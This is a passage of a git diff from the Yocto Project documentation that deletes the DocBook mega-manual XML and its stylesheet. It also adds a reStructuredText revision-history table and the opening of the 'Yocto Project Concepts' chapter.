deleted file mode 100755
index cea1464890..0000000000
--- a/documentation/mega-manual/mega-manual.xml
+++ /dev/null
@@ -1,382 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-
-<book id='mega-manual' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
-
- <bookinfo>
-
- <abstract>
- The Yocto Project Mega-Manual is a concatenation of the published
- Yocto Project HTML manuals along with the corresponding BitBake
- User Manual for the given release.
- The Mega-Manual exists to help users efficiently search for strings
- across the entire Yocto Project documentation set inclusive of
- the BitBake User Manual.
- </abstract>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/mega-title.png'
- format='SVG'
- align='left' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- Yocto Project Mega-Manual
- </title>
-
- <authorgroup>
- <author>
- <affiliation>
- <orgname>&ORGNAME;</orgname>
- </affiliation>
- <email>&ORGEMAIL;</email>
- </author>
- </authorgroup>
-
- <revhistory>
- <revision>
- <revnumber>1.8</revnumber>
- <date>April 2015</date>
- <revremark>The initial document released with the Yocto Project 1.8 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.0</revnumber>
- <date>October 2015</date>
- <revremark>Released with the Yocto Project 2.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.1</revnumber>
- <date>April 2016</date>
- <revremark>Released with the Yocto Project 2.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.2</revnumber>
- <date>October 2016</date>
- <revremark>Released with the Yocto Project 2.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.3</revnumber>
- <date>May 2017</date>
- <revremark>Released with the Yocto Project 2.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.4</revnumber>
- <date>October 2017</date>
- <revremark>Released with the Yocto Project 2.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.5</revnumber>
- <date>May 2018</date>
- <revremark>Released with the Yocto Project 2.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.6</revnumber>
- <date>November 2018</date>
- <revremark>Released with the Yocto Project 2.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.7</revnumber>
- <date>May 2019</date>
- <revremark>Released with the Yocto Project 2.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.0</revnumber>
- <date>October 2019</date>
- <revremark>Released with the Yocto Project 3.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1</revnumber>
- <date>April 2020</date>
- <revremark>Released with the Yocto Project 3.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.1</revnumber>
- <date>June 2020</date>
- <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.2</revnumber>
- <date>August 2020</date>
- <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.3</revnumber>
- <date>October 2020</date>
- <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.4</revnumber>
- <date>&REL_MONTH_YEAR;</date>
- <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
- </revision>
- </revhistory>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
- </para>
- <note><title>Manual Notes</title>
- <itemizedlist>
- <listitem><para>
- This version of the
- <emphasis>Yocto Project Mega-Manual</emphasis>
- is for the &YOCTO_DOC_VERSION; release of the
- Yocto Project.
- To be sure you have the latest version of the manual
- for this release, go to the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual from that site.
- Manuals from the site are more up-to-date than manuals
- derived from the Yocto Project released TAR files.
- </para></listitem>
- <listitem><para>
- If you located this manual through a web search, the
- version of the manual might not be the one you want
- (e.g. the search might have returned a manual much
- older than the Yocto Project version with which you
- are working).
- You can see all Yocto Project major releases by
- visiting the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
- page.
- If you need a version of this manual for a different
- Yocto Project release, visit the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual set by using the
- "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
- pull-down menus.
- </para></listitem>
- <listitem>
- <para>
- To report any inaccuracies or problems with this
- (or any other Yocto Project) manual, send an email to
- the Yocto Project documentation mailing list at
- <filename>docs@lists.yoctoproject.org</filename> or
- log into the freenode <filename>#yocto</filename> channel.
- </para>
- </listitem>
- </itemizedlist>
- </note>
-
- </legalnotice>
-
- </bookinfo>
-
-<!-- Includes brief-yoctoprojectqs -->
-
- <para>
- <imagedata fileref="figures/bypqs-title.png" width="100%" align="left" scalefit="1" />
- </para>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../brief-yoctoprojectqs/brief-yoctoprojectqs.xml"/>
-
-<!-- Includes overview-manual title image and then overview-manual chapters -->
-
- <para>
- <imagedata fileref="figures/overview-manual-title.png" width="100%" align="left" scalefit="1" />
- </para>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../overview-manual/overview-manual-intro.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../overview-manual/overview-manual-yp-intro.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../overview-manual/overview-manual-development-environment.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../overview-manual/overview-manual-concepts.xml"/>
-
-<!-- Includes dev-manual title image and then dev-manual chapters -->
-
- <para>
- <imagedata fileref="figures/dev-title.png" width="100%" align="left" scalefit="1" />
- </para>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../dev-manual/dev-manual-intro.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../dev-manual/dev-manual-start.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../dev-manual/dev-manual-common-tasks.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../dev-manual/dev-manual-qemu.xml"/>
-
-<!-- Includes sdk-manual title image and then sdk-manual chapters -->
-
- <para>
- <imagedata fileref="figures/sdk-title.png" width="100%" align="left" scalefit="1" />
- </para>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-intro.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-extensible.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-using.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-working-projects.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-appendix-obtain.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-appendix-customizing.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../sdk-manual/sdk-appendix-customizing-standard.xml"/>
-
-<!-- Includes bsp-guide title image and then bsp-guide chapters -->
-
- <para>
- <imagedata fileref="figures/bsp-title.png" width="100%" align="left" scalefit="1" />
- </para>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../bsp-guide/bsp.xml"/>
-
-<!-- Includes kernel-dev title image and then kernel-dev chapters -->
-
- <para>
- <imagedata fileref="figures/kernel-dev-title.png" width="100%" align="left" scalefit="1" />
- </para>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../kernel-dev/kernel-dev-intro.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../kernel-dev/kernel-dev-common.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../kernel-dev/kernel-dev-advanced.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../kernel-dev/kernel-dev-concepts-appx.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../kernel-dev/kernel-dev-maint-appx.xml"/>
-
-<!-- Includes profile-manual title image and then profile-manual chapters -->
-
- <para>
- <imagedata fileref="figures/profile-title.png" width="100%" align="left" scalefit="1" />
- </para>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../profile-manual/profile-manual-intro.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../profile-manual/profile-manual-arch.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../profile-manual/profile-manual-usage.xml"/>
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../profile-manual/profile-manual-examples.xml"/>
-
-<!-- Includes ref-manual title image and then ref-manual chapters -->
-
- <para>
- <imagedata fileref="figures/poky-title.png" width="100%" align="left" scalefit="1" />
- </para>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-system-requirements.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-terms.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-release-process.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/migration.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-structure.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-classes.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-tasks.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-devtool-reference.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-kickstart.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-qa-checks.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-images.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-features.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-variables.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/ref-varlocality.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/faq.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../ref-manual/resources.xml"/>
-
-<!-- Includes toaster-manual title image and then toaster-manual chapters -->
-
- <para>
- <imagedata fileref="figures/toaster-title.png" width="100%" align="left" scalefit="1" />
- </para>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../toaster-manual/toaster-manual-intro.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../toaster-manual/toaster-manual-start.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../toaster-manual/toaster-manual-setup-and-use.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../toaster-manual/toaster-manual-reference.xml"/>
-
-<!-- Includes bitbake-user-manual title image and then bitbake-user-manual chapters -->
-
- <para>
- <imagedata fileref="figures/bitbake-title.png" width="100%" align="left" scalefit="1" />
- </para>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.xml"/>
-
- <xi:include
- xmlns:xi="http://www.w3.org/2003/XInclude" href="../../bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.xml"/>
-
-</book>
-
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/mega-manual/mega-style.css b/documentation/mega-manual/mega-style.css
deleted file mode 100644
index cd71eb6425..0000000000
--- a/documentation/mega-manual/mega-style.css
+++ /dev/null
@@ -1,989 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/mega-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-
-.writernotes {
- color: red;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/overview-manual/history.rst b/documentation/overview-manual/history.rst
new file mode 100644
index 0000000000..5fde8f09dd
--- /dev/null
+++ b/documentation/overview-manual/history.rst
@@ -0,0 +1,40 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+ :widths: 10 15 40
+ :header-rows: 1
+
+ * - Revision
+ - Date
+ - Note
+ * - 2.5
+ - May 2018
+ - The initial document released with the Yocto Project 2.5 Release
+ * - 2.6
+ - November 2018
+ - Released with the Yocto Project 2.6 Release.
+ * - 2.7
+ - May 2019
+ - Released with the Yocto Project 2.7 Release.
+ * - 3.0
+ - October 2019
+ - Released with the Yocto Project 3.0 Release.
+ * - 3.1
+ - April 2020
+ - Released with the Yocto Project 3.1 Release.
+ * - 3.1.1
+ - June 2020
+ - Released with the Yocto Project 3.1.1 Release.
+ * - 3.1.2
+ - August 2020
+ - Released with the Yocto Project 3.1.2 Release.
+ * - 3.1.3
+ - September 2020
+ - Released with the Yocto Project 3.1.3 Release.
+ * - 3.1.4
+ - November 2020
+ - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/overview-manual/overview-manual-concepts.rst b/documentation/overview-manual/overview-manual-concepts.rst
new file mode 100644
index 0000000000..3401f534b1
--- /dev/null
+++ b/documentation/overview-manual/overview-manual-concepts.rst
@@ -0,0 +1,2183 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**********************
+Yocto Project Concepts
+**********************
+
+This chapter provides explanations for Yocto Project concepts that go
+beyond the surface of "how-to" information and reference (or look-up)
+material. Concepts such as components, the :term:`OpenEmbedded Build System`
+workflow,
+cross-development toolchains, shared state cache, and so forth are
+explained.
+
+Yocto Project Components
+========================
+
+The :term:`BitBake` task executor
+together with various types of configuration files form the
+:term:`OpenEmbedded-Core (OE-Core)`. This section
